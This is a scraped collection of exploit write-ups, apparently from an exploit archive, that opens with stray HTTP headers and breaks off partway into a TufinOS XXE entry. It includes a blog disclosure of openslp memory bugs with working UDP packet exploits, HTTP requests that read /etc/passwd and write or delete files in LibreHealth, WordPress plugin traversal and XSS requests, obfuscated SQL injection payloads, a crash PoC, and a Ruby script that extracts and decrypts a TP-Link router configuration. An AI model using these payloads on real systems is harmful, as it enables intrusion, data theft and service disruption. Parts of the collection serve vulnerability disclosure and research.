Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Location: /[PATH]
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
HireHackking 

     _                        _     
    / |   ___ ___ ___ ___ ___| |___ 
 _ / /   | . | . | -_|   |_ -| | . |
|_|_/    |___|  _|___|_|_|___|_|  _|
             |_|               |_|  

2018-11-07

MORE BUGS IN OPENSLP-2.0.0
==========================

I discovered some bugs in openslp-2.0.0 back in January, 2018. 
One of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free),
and today I'm disclosing two more.


BUG 1
=====

This issue is an OOB read that does not crash the application.
So in terms of exploitation it is not very interesting. If that's what
you're here for then scroll down to bug#2.
After the occurence of the bug the application actually detects the error
and ignores the malicious packet. Therefore, it could be argued that this
is not a bug at all. Nevertheless, here it is:

Proof of concept exploit:

  echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d > /dev/udp/127.0.0.1/427

Valgrind report:

  ==27968== Invalid read of size 1
  ==27968== at 0x412436: GetUINT16 (slp_message.c:63)
  ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327)
  ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005)
  ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393)
  ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)
  ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)
  ==27968== by 0x40256B: main (slpd_main.c:699)
  ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd
  ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
  ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67)
  ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139)
  ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383)
  ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)
  ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)
  ==27968== by 0x40256B: main (slpd_main.c:699)

Analysis:

v2ParseSrvReg is responsible for parsing incoming requests. Various bytes
are read from the packet and interpreted as integers used as length fields.
One of them is the scopelistlen, parsed on line 321, and further used as
argument for the amount of bytes to increment the buffer->curpos pointer
in the the GetStrPtr function, shown below on line 112. It now points to
uninitialized memory.

The OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos 
pointer is dereferenced.

Subsequently the comparison on line 329 evaluates to true since the
buffer->curpos now points to memory located after the buffer->end
pointer. The application therefore stops processing the malicious packet.

  291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg)
  292 {
  293    int result;
  294
  295 /*  0                   1                   2                   3
  296     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
  297    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  298    |                          <URL-Entry>                          \
  299    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  300    | length of service type string |        <service-type>         \
  301    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  302    |     length of <scope-list>    |         <scope-list>          \
  303    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  304    |  length of attr-list string   |          <attr-list>          \
  305    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  306    |# of AttrAuths |(if present) Attribute Authentication Blocks...\
  307    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */
  308
  309    /* Parse the <URL-Entry>. */
  310    result = v2ParseUrlEntry(buffer, &srvreg->urlentry);
  311    if (result != 0)
  312       return result;
  313
  314    /* Parse the <service-type> string. */
  315    srvreg->srvtypelen = GetUINT16(&buffer->curpos);
  316    srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen);
  317    if (buffer->curpos > buffer->end)
  318       return SLP_ERROR_PARSE_ERROR;
  319
  320    /* Parse the <scope-list> string. */
  321    srvreg->scopelistlen = GetUINT16(&buffer->curpos);
  322    srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen);
  323    if (buffer->curpos > buffer->end)
  324       return SLP_ERROR_PARSE_ERROR;
  325
  326    /* Parse the <attr-list> string. */
  327    srvreg->attrlistlen = GetUINT16(&buffer->curpos);
  328    srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen);
  329    if (buffer->curpos > buffer->end)
  330       return SLP_ERROR_PARSE_ERROR;
 
   54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word.
   55  *
   56  * @param[in,out] cpp - The address of a pointer from which to extract.
   57  *
   58  * @return A 16-bit unsigned value in native format; the buffer pointer
   59  *    is moved ahead by 2 bytes on return.
   60  */
   61 uint16_t GetUINT16(uint8_t ** cpp)
   62 {
   63    uint16_t rv = AS_UINT16(*cpp);
   64    *cpp += 2;
   65    return rv;
   66 }
  ...
   96 /** Extract a string buffer address into a character pointer.
   97  *
   98  * Note that this routine doesn't actually copy the string. It only casts
   99  * the buffer pointer to a character pointer and moves the value at @p cpp
  100  * ahead by @p len bytes.
  101  *
  102  * @param[in,out] cpp - The address of a pointer from which to extract.
  103  * @param[in] len - The length of the string to extract.
  104  *
  105  * @return A pointer to the first character at the address pointed to by
  106  *    @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes
  107  *    on return.
  108  */
  109 char * GetStrPtr(uint8_t ** cpp, size_t len)
  110 {
  111    char * sp = (char *)*cpp;
  112    *cpp += len;
  113    return sp;
  114 }


Proof of discovery: 

  $ echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d | sha256sum
  0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946  -

twitter.com/magnusstubman/status/953909628622069760


Patch:

I'm not aware of any patch, and I'm not sure the maintainers are going to patch it.

BUG 2
=====

First and foremost, I'm not claiming credit for this bug since it was
apparently discovered by Reno Robert and publicly disclosed on the
oss-security mailing list on 2016-09-27 and awarded CVE-2016-7567
the day after.

openwall.com/lists/oss-security/2016/09/27/4
openwall.com/lists/oss-security/2016/09/28/1

Anyhow, I wasn't aware of the issue and found it by fuzzing, so I
reported it to the maintainers who made me aware of the earlier discovery.
What puzzled me was that no announcement had been made and the fact that
the latest stable version on their website is still vulnerable! I found it
2017-12-06 and reported it 2018-01-18. See further down for proof of
discovery.

I havn't been able to find any exploit for this bug anywhere. Therefore,
I'm today disclosing a proof-of-concept exploit for the bug to increase
attention on the issue.

Exploit:

  echo -n "AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==" | base64 -d > /dev/udp/127.0.0.1/427

Valgrind report:

  ==56913== Invalid write of size 1
  ==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914)
  ==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210)
  ==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374)
  ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)
  ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)
  ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)
  ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)
  ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)
  ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)
  ==56913== by 0x402383: main (slpd_main.c:699)
  ==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd
  ==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
  ==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356)
  ==56913== by 0x410096: SLPCompareString (slp_compare.c:365)
  ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)
  ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)
  ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)
  ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)
  ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)
  ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)
  ==56913== by 0x402383: main (slpd_main.c:699)

The while loop on line 207 fails to perform bounds checking, and as such
may end up incrementing the pointer p up to a point such that p is bigger
than ep. Thus, the third argument to memmove on line 2010 becomes negative.
However, since memmove accepts a size_t (which is unsigned) the value wraps
around and becomes UINT_MAX or close to UINT_MAX resulting in memmove
attempting to move an excessive amount of memory, resulting in OOB write.

  184 /** fold internal white space within a string.
  185  *
  186  * folds all internal white space to a single space character within a
  187  * specified string. modified the @p str parameter with the result and
  188  * returns the new length of the string.
  189  *
  190  * @param[in] len - the length in bytes of @p str.
  191  * @param[in,out] str - the string from which extraneous white space
  192  *    should be removed.
  193  *
  194  * @return the new (shorter) length of @p str.
  195  *
  196  * @note this routine assumes that leading and trailing white space have
  197  *    already been removed from @p str.
  198  */
  199 static int slpfoldwhitespace(size_t len, char * str)
  200 {
  201    char * p = str, * ep = str + len;
  202    while (p < ep)
  203    {
  204       if (isspace(*p))
  205       {
  206          char * ws2p = ++p;         /* point ws2p to the second ws char. */
  207          while (isspace(*p))        /* scan till we hit a non-ws char. */
  208             p++;
  209          len -= p - ws2p;           /* reduce the length by extra ws. */
  210          memmove(ws2p, p, ep - p);  /* overwrite the extra white space. */
  211       }
  212       p++;
  213    }
  214    return (int)len;
  215 }

Proof of discovery:

  $ echo -n "AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==" | base64 -d | sha256sum
  5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24  -

twitter.com/magnusstubman/status/938317849474555904

Patch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a 

REFERENCES
==========

- sourceforge.net/p/openslp/bugs/161
- sourceforge.net/p/openslp/bugs/160
- twitter.com/magnusstubman/status/938317849474555904
- twitter.com/magnusstubman/status/953909628622069760
- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a
- openwall.com/lists/oss-security/2016/09/27/4
- openwall.com/lists/oss-security/2016/09/28/1
HireHackking 
# Exploit Title: LibreHealth 2.0.0 - Arbitrary File Actions 
# Date: 2018-10-19
# Exploit Author: Carlos Avila
# Vendor Homepage: https://librehealth.io/
# Software Link: https://github.com/LibreHealthIO/lh-ehr
# Version: < 2.0.0
# Tested on: Debian LAMP, LibreHealth 2.0.0

# LibreHealth is the 'fork' of the OpenEMR project. I have executed these PoCs 
# based on on Bug Reported by Joshua Fam [@Insecurity]
 
# 1.Arbitrary File Read:
# In LibreHealth a user that has access to the portal patient (authenticated) can send a 
# malicious POST request to read arbitrary files.
 
POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded

mode=get&docid=/etc/passwd
 
# This attack represents a file inclusion attack (LFI)
# 2.Arbitrary File Write:
# In LibreHealth a user that has access to the portal patient (authenticated) can send 
# a malicious POST request to write arbitrary files.
  
POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded

mode=save&docid=payload.php&content=<?php phpinfo();?>

# When you send the attack you can browse the website where the file was written and 
# the payload.php at http://192.168.6.200/patients/payload.php
# 3. Arbitrary File Delete:
# In LibreHealth a user that has access to the portal patient (authenticated) can send a 
# malicious POST request to delete a arbitrary file.
      
POST /patients/import_template.php HTTP/1.1
Host: 192.168.6.200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: LibreHealthEHR=jujkd0kvkpde70328l2v79kl90; PHPSESSID=gi8mp1e30csk5k7ji2hjo99lu4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
 
mode=delete&docid=payload.php
        
# When you make the attack you can navigate on the deleted page and you should receive 404 error (page not found)
HireHackking 
# Exploit Title: HeidiSQL 9.5.0.5196 - Denial of Service (PoC)
# Discovery by: Victor Mondragón
# Discovery Date: 2018-11-06
# Vendor Homepage: https://www.heidisql.com/
# Software Link: https://www.heidisql.com/download.php
# Tested Version: 9.5.0.5196
# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: HeidiSQL 9.5.0.5196.py
#2.- Open bd.txt and copy content to clipboard
#2.- Open HeidiSQL
#3.- Select "More"
#4.- Select "Preferences" > "Logging"
#5.- Select "Write SQL log to file" and Paste ClipBoard
#6.- Click on "OK"
#7.- Crashed

cod = "\x41" * 5000

f = open('bd.txt', 'w')
f.write(cod)
f.close()
HireHackking 
# Exploit Title: Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal
# Date: 2018-05-11
# Exploit Author: Pasquale Turi (aka boombyte)
# Vendor Homepage: https://wordpress.org/plugins/media-file-manager/
# Software Link: https://wordpress.org/plugins/media-file-manager/
# Version: 1.4.2
# CVE: N/A
# Tested on: Ubuntu 18.10

# Plugin description:
# This plugin can be used for manage the uploaded file (we can rename files, see a preview, 
# delete and move them to other folders under wordpress upload 	folder).
# This plugin can be used by administrator, author, contributor and subscriber.

# POC
# Diretory trasversal:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: REDATED
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie:	REDACTED

action=mrelocator_getdir&dir=../../../../../../../etc

# POC
# XSS Reflected

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: close
Cookie: REDACTED

action=mrelocator_getdir&dir=[XSS]

# POC
# Move any file to any dir:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: REDACTED

action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php

# POC
# Rename any file:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Connection: close
Cookie:	REDACTED

action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt
HireHackking 
# Exploit Title: Paroiciel 11.20 - 'tRecIdListe' SQL Injection
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.paroiciel.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/paroiciel/version%2011/par6lus_11_20160225.exe
# Version: 11.20
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/html/trec.php?tRecAction=P&tRecIdListe=[SQL]
# 
GET /[PATH]/html/trec.php?tRecAction=P&tRecIdListe=-1%27%20%20UNION%20SELECT%201,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),3,4,5,6,7,8,9,10,11--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: paroi6l_auth=euae0ldrb8q0rrnnc017etn9l3paroiciel11; PHPSESSID=euae0ldrb8q0rrnnc017etn9l3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 23:39:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

# POC: 
# 2)
# http://localhost/[PATH]/html/zpro.php?zProAction=M&zProIdPro=[SQL]
# 
GET /[PATH]/html/zpro.php?zProAction=M&zProIdPro=%2d%32%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: paroi6l_auth=euae0ldrb8q0rrnnc017etn9l3paroiciel11; PHPSESSID=euae0ldrb8q0rrnnc017etn9l3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 23:51:21 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

# POC: 
# 3)
# http://localhost/[PATH]/html/egeq.php?eGeqActEquipe=M&eGeqIdEquipe=[SQL]
# 
GET /[PATH]/html/egeq.php?eGeqActEquipe=M&eGeqIdEquipe=%27%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: paroi6l_auth=euae0ldrb8q0rrnnc017etn9l3paroiciel11; PHPSESSID=euae0ldrb8q0rrnnc017etn9l3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 23:59:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 625
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
HireHackking 
# Exploit Title: Data Center Audit 2.6.2 - 'username' SQL Injection
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/datacenteraudit/
# Software Link: https://netix.dl.sourceforge.net/project/datacenteraudit/data_center_audit_v262.zip
# Version: 2.6.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/dca_login.php
# 
POST /[PATH]/dca_login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 288
username=112'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&pass=1&submit=Login
HTTP/1.1 200 OK
Date: Fri, 09 Nov 2018 12:53:07 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 422
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit Title: TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)
# Date: 2018-11-07
# Exploit Author: Wadeek
# Vendor Homepage: https://www.tp-link.com/
# Hardware Version: Archer C50 v3 00000001
# Firmware Link: https://www.tp-link.com/download/Archer-C50_V3.html#Firmware
# Firmware Version: <= Build 171227

#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
url = "http://192.168.0.1:80/"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

require('base64')
require('openssl')
require('mechanize')
agent = Mechanize.new()
# require HTTP Proxy (chunk error)
agent.set_proxy("127.0.0.1", "8080")

def scan(agent, url, path, query)
begin
	puts(path)
	response = agent.post(url+path, query, {
		"User-Agent" => "",
		"Accept" => "*/*",
		"Referer" => "http://192.168.0.1/mainFrame.htm",
		"Content-Type" => "text/plain",
		"Connection" => "keep-alive",
		"Cookie" => ""
	})
rescue Exception => e
	begin
	puts(e.inspect())
	#
	body = e.page().body()
	content = Base64.decode64(body.scan(/ZAP Error \[java\.io\.IOException\]\: Bad chunk size\: (.*)/).join())
	puts(body.inspect())
	cipher = OpenSSL::Cipher.new("des-ecb")
	cipher.key = "478DA50BF9E3D2CF"
	cipher.decrypt()
	output = cipher.update(content)
	#
	file = File.open("conf.bin.raw", "wb")
	file.write(output)
	file.close()
	rescue Exception => e
		puts(e)
	end
	puts("")
end
end

#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
payload = "\x5b\x49\x47\x44\x5f\x44\x45\x56\x5f\x49\x4e\x46\x4f\x23\x30"+
"\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x23\x30\x2c\x30\x2c"+
"\x30\x2c\x30\x2c\x30\x2c\x30\x5d\x30\x2c\x34\xd\xa\x6d\x6f\x64"+
"\x65\x6c\x4e\x61\x6d\x65\xd\xa\x64\x65\x73\x63\x72\x69\x70\x74"+
"\x69\x6f\x6e\xd\xa\x58\x5f\x54\x50\x5f\x69\x73\x46\x44\xd\xa\x58"+
"\x5f\x54\x50\x5f\x50\x72\x6f\x64\x75\x63\x74\x56\x65\x72\x73\x69"+
"\x6f\x6e\xd\xa\x5b\x45\x54\x48\x5f\x53\x57\x49\x54\x43\x48\x23\x30"+
"\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x23\x30\x2c\x30\x2c\x30\x2c"+
"\x30\x2c\x30\x2c\x30\x5d\x31\x2c\x31\xd\xa\x6e\x75\x6d\x62\x65\x72"+
"\x4f\x66\x56\x69\x72\x74\x75\x61\x6c\x50\x6f\x72\x74\x73\xd\xa\x5b"+
"\x53\x59\x53\x5f\x4d\x4f\x44\x45\x23\x30\x2c\x30\x2c\x30\x2c\x30\x2c"+
"\x30\x2c\x30\x23\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x5d\x32"+
"\x2c\x31\xd\xa\x6d\x6f\x64\x65\xd\xa\x5b\x2f\x63\x67\x69\x2f\x63\x6f"+
"\x6e\x66\x65\x6e\x63\x6f\x64\x65\x23\x30\x2c\x30\x2c\x30\x2c\x30"+
"\x2c\x30\x2c\x30\x23\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30\x2c\x30"+
"\x5d\x33\x2c\x30\xd\xa\x3d"
#puts(payload)
scan(agent, url, "cgi?1&1&1&8", payload)
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
HireHackking 
# Exploit Title: TufinOS 2.17 Build 1193 - XML External Entity Injection
# Exploit Author: konstantinos Alexiou
# Date: 2018-10-18
# Vendor: https://www.tufin.com
# Software Link: https://www.tufin.com/tufin-orchestration-suite/securetrack
# CVE: N/A
# Category: webapps

# 1. Description
# The SecureTrack application is vulnerable to XML External Entity injection. 
# This attack is considered quite serious and can be used to:
# (1) Retrieve confidential data
# (2) Perform denial of service
# (3) Execute server side request forgery attacks
# (4) Perform port scanning through the machine on other systems 

